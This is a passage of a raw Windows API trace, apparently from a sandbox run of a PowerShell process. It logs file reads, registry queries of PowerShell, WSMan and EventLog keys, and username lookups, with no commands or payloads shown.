dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.562] GetLastError () returned 0x0 [0050.562] GetFileType (hFile=0x328) returned 0x1 [0050.562] SetErrorMode (uMode=0x1) returned 0x1 [0050.562] GetFileType (hFile=0x328) returned 0x1 [0050.562] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.564] GetLastError () returned 0x0 [0050.565] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.565] GetLastError () returned 0x0 [0050.565] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.565] GetLastError () returned 0x0 [0050.565] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.565] GetLastError () returned 0x0 [0050.566] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0xe98, lpOverlapped=0x0) returned 1 [0050.566] GetLastError () returned 0x0 [0050.566] ReadFile (in: hFile=0x328, lpBuffer=0x348463c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x348463c*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.566] GetLastError () returned 0x0 [0050.566] ReadFile (in: hFile=0x328, lpBuffer=0x3485004, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3485004*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.566] GetLastError () returned 0x0 [0050.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.567] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.567] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.567] RegCloseKey (hKey=0x328) returned 0x0 [0050.568] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xfb766a49, Data2=0x5109, Data3=0x4891, Data4=([0]=0xac, [1]=0xc6, [2]=0xa6, [3]=0xd4, [4]=0x34, [5]=0x64, [6]=0xbf, [7]=0x52))) returned 0x0 [0050.568] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd2adc0f4, Data2=0xd709, Data3=0x4034, Data4=([0]=0x9a, [1]=0x60, [2]=0xd5, [3]=0x20, [4]=0xf9, [5]=0xa4, [6]=0xd0, [7]=0xd1))) returned 0x0 [0050.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0050.579] GetLastError () returned 0x57 [0050.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0050.580] GetLastError () returned 0x57 [0050.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.593] GetLastError () returned 0x57 [0050.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.593] GetLastError () returned 0x57 [0050.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.595] GetLastError () returned 0x57 [0050.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.596] GetLastError () returned 0x57 [0050.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.598] GetLastError () returned 0x57 [0050.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.598] GetLastError () returned 0x57 [0050.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.600] GetLastError () returned 0x57 [0050.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.601] GetLastError () returned 0x57 [0050.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.603] GetLastError () returned 0x57 [0050.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.603] GetLastError () returned 0x57 [0050.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.616] GetLastError () returned 0x57 [0050.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19e1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.616] GetLastError () returned 0x57 [0050.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.630] GetLastError () returned 0xcb [0050.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.631] GetLastError () returned 0xcb [0050.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.632] GetLastError () returned 0xcb [0050.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.633] GetLastError () returned 0xcb [0050.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.640] GetLastError () returned 0xcb [0050.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e57c | out: phkResult=0x19e57c*=0x328) returned 0x0 [0050.646] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e5d0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e5cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e5d0*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.648] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x247300, lpcchValueName=0x19e5f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x19e5f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.648] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x247300, lpcchValueName=0x19e5f4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x19e5f4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.648] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x19e5d4, lpData=0x0, lpcbData=0x19e5d0*=0x0 | out: lpType=0x19e5d4*=0x1, lpData=0x0, lpcbData=0x19e5d0*=0x8) returned 0x0 [0050.648] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x19e5d4, lpData=0x247300, lpcbData=0x19e5d0*=0x8 | out: lpType=0x19e5d4*=0x1, lpData="2.0", lpcbData=0x19e5d0*=0x8) returned 0x0 [0050.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e538 | out: phkResult=0x19e538*=0x32c) returned 0x0 [0050.689] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e588, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e58c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e588*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e58c*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.689] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x247300, lpcchValueName=0x19e5b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x19e5b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.689] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x247300, lpcchValueName=0x19e5b0, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x19e5b0, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.689] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x19e590, lpData=0x0, lpcbData=0x19e58c*=0x0 | out: lpType=0x19e590*=0x1, lpData=0x0, lpcbData=0x19e58c*=0x8) returned 0x0 [0050.689] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x19e590, lpData=0x247300, lpcbData=0x19e58c*=0x8 | out: lpType=0x19e590*=0x1, lpData="2.0", lpcbData=0x19e58c*=0x8) returned 0x0 [0050.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.691] GetLastError () returned 0xcb [0050.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.693] GetLastError () returned 0xcb [0050.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e4f8 | out: phkResult=0x19e4f8*=0x330) returned 0x0 [0050.704] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e560, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e55c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e560*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e55c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.704] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.705] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.706] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.706] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x247300, lpcchName=0x19e57c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x19e57c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.706] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x34c) returned 0x0 [0050.706] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.706] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x35c) returned 0x0 [0050.706] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.707] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x364) returned 0x0 [0050.707] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.707] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x368) returned 0x0 [0050.707] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.707] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x36c) returned 0x0 [0050.707] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.707] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x370) returned 0x0 [0050.708] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.708] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x374) returned 0x0 [0050.708] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.708] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x378) returned 0x0 [0050.708] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x0) returned 0x2 [0050.708] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x37c) returned 0x0 [0050.709] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e528 | out: phkResult=0x19e528*=0x380) returned 0x0 [0050.709] RegCloseKey (hKey=0x380) returned 0x0 [0050.709] RegCloseKey (hKey=0x330) returned 0x0 [0050.709] RegCloseKey (hKey=0x37c) returned 0x0 [0050.726] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e674 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e674) returned 0x1 [0050.728] GetLastError () returned 0x3 [0050.728] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e67c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e67c) returned 1 [0050.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e4dc | out: phkResult=0x19e4dc*=0x330) returned 0x0 [0050.780] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19e544, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e540, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19e544*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x19e540*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.780] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.780] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.780] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.780] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x247300, lpcchName=0x19e560, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x19e560, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.781] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e50c | out: phkResult=0x19e50c*=0x380) returned 0x0 [0050.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, 